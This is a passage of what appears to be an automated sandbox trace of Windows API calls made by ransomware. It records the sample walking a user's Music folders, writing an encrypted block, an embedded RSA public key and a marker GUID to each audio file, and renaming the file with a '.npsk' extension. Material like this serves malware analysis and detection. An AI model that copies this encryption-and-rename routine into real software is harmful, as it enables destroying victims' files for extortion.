pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.639] GetLastError () returned 0x0 [0217.639] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.640] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0217.640] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.640] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.640] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.640] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.640] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xa799, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.640] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.641] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.641] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.641] CloseHandle (hObject=0x61c) returned 1 [0217.642] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\QW-82BrGFMTY.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\qw-82brgfmty.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\QW-82BrGFMTY.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\qw-82brgfmty.mp3.npsk")) returned 1 [0217.644] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13c54060, ftCreationTime.dwHighDateTime=0x1d5db92, ftLastAccessTime.dwLowDateTime=0xfa4ab8e0, ftLastAccessTime.dwHighDateTime=0x1d5dc90, ftLastWriteTime.dwLowDateTime=0xfa4ab8e0, ftLastWriteTime.dwHighDateTime=0x1d5dc90, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rVXVsh_t_ccJVHipK.m4a", cAlternateFileName="RVXVSH~1.M4A")) returned 1 [0217.644] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\rVXVsh_t_ccJVHipK.m4a") returned=".m4a" [0217.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\rVXVsh_t_ccJVHipK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\rvxvsh_t_ccjvhipk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.644] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=72076) returned 1 [0217.644] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.646] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11966, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.646] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.648] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x1198c, lpOverlapped=0x0) returned 1 [0217.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.649] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f08) returned 1 [0217.650] CryptCreateHash (in: hProv=0x7b1f08, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.650] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.650] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.650] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.650] GetLastError () returned 0x0 [0217.650] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.650] CryptReleaseContext (hProv=0x7b1f08, dwFlags=0x0) returned 1 [0217.650] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.650] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.650] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.650] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.651] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1198c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.651] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.651] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.651] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.651] CloseHandle (hObject=0x61c) returned 1 [0217.653] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\rVXVsh_t_ccJVHipK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\rvxvsh_t_ccjvhipk.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\rVXVsh_t_ccJVHipK.m4a.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\rvxvsh_t_ccjvhipk.m4a.npsk")) returned 1 [0217.655] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23effee0, ftCreationTime.dwHighDateTime=0x1d5db82, ftLastAccessTime.dwLowDateTime=0xc5100930, ftLastAccessTime.dwHighDateTime=0x1d5dc29, ftLastWriteTime.dwLowDateTime=0xc5100930, ftLastWriteTime.dwHighDateTime=0x1d5dc29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sfOvbWyBWDmisY", cAlternateFileName="SFOVBW~1")) returned 1 [0217.655] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa42e00, ftCreationTime.dwHighDateTime=0x1d5ddd7, ftLastAccessTime.dwLowDateTime=0x32511000, ftLastAccessTime.dwHighDateTime=0x1d5db69, ftLastWriteTime.dwLowDateTime=0x32511000, ftLastWriteTime.dwHighDateTime=0x1d5db69, nFileSizeHigh=0x0, nFileSizeLow=0x4d7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Ig3Tyv.mp3", cAlternateFileName="")) returned 1 [0217.655] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\_Ig3Tyv.mp3") returned=".mp3" [0217.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\_Ig3Tyv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\_ig3tyv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.656] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=19837) returned 1 [0217.656] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.658] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4d57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.658] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.660] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0217.660] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x4d7d, lpOverlapped=0x0) returned 1 [0217.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.661] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0217.662] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.662] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.662] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0217.663] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0217.663] GetLastError () returned 0x0 [0217.663] CryptDestroyHash (hHash=0x3277d68) returned 1 [0217.663] CryptReleaseContext (hProv=0x7b1e80, dwFlags=0x0) returned 1 [0217.663] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0217.663] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0217.663] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0217.663] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a8ffa0, Size=0x218) returned 0x3a8afa0 [0217.664] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4d7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.664] WriteFile (in: hFile=0x61c, lpBuffer=0x3aa1ce8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3aa1ce8*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0217.664] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0217.664] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0217.664] CloseHandle (hObject=0x61c) returned 1 [0217.666] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\_Ig3Tyv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\_ig3tyv.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\tP3BeQ_6ct\\_Ig3Tyv.mp3.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\tp3beq_6ct\\_ig3tyv.mp3.npsk")) returned 1 [0217.668] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa42e00, ftCreationTime.dwHighDateTime=0x1d5ddd7, ftLastAccessTime.dwLowDateTime=0x32511000, ftLastAccessTime.dwHighDateTime=0x1d5db69, ftLastWriteTime.dwLowDateTime=0x32511000, ftLastWriteTime.dwHighDateTime=0x1d5db69, nFileSizeHigh=0x0, nFileSizeLow=0x4d7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Ig3Tyv.mp3", cAlternateFileName="")) returned 0 [0217.668] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0217.668] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0217.668] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0217.668] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\") returned="xaU6e6HDu\\" [0217.668] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\") returned="sg3CqdHoD\\" [0217.668] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\") returned="tCN4\\" [0217.668] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0217.668] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0217.668] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0217.669] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0217.669] PathFindFileNameW (pszPath="") returned="" [0217.669] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f22e0a0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x92453b80, ftLastAccessTime.dwHighDateTime=0x1d5dbd7, ftLastWriteTime.dwLowDateTime=0x92453b80, ftLastWriteTime.dwHighDateTime=0x1d5dbd7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0217.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f22e0a0, ftCreationTime.dwHighDateTime=0x1d5e18e, ftLastAccessTime.dwLowDateTime=0x92453b80, ftLastAccessTime.dwHighDateTime=0x1d5dbd7, ftLastWriteTime.dwLowDateTime=0x92453b80, ftLastWriteTime.dwHighDateTime=0x1d5dbd7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0217.672] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b839fe0, ftCreationTime.dwHighDateTime=0x1d5e03a, ftLastAccessTime.dwLowDateTime=0xfe666f30, ftLastAccessTime.dwHighDateTime=0x1d5d9bd, ftLastWriteTime.dwLowDateTime=0xfe666f30, ftLastWriteTime.dwHighDateTime=0x1d5d9bd, nFileSizeHigh=0x0, nFileSizeLow=0x118bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3QWG9KFA2sO0gs-vF.mp3", cAlternateFileName="3QWG9K~1.MP3")) returned 1 [0217.672] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\3QWG9KFA2sO0gs-vF.mp3") returned=".mp3" [0217.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\tCN4\\sg3CqdHoD\\xaU6e6HDu\\3QWG9KFA2sO0gs-vF.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\tcn4\\sg3cqdhod\\xau6e6hdu\\3qwg9kfa2so0gs-vf.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0217.673] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=71868) returned 1 [0217.673] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0217.675] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11896, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.675] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0217.676] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x118bc, lpOverlapped=0x0) returned 1 [0217.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.677] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0217.677] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1e80) returned 1 [0217.678] CryptCreateHash (in: hProv=0x7b1e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0217.678] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0217.678] 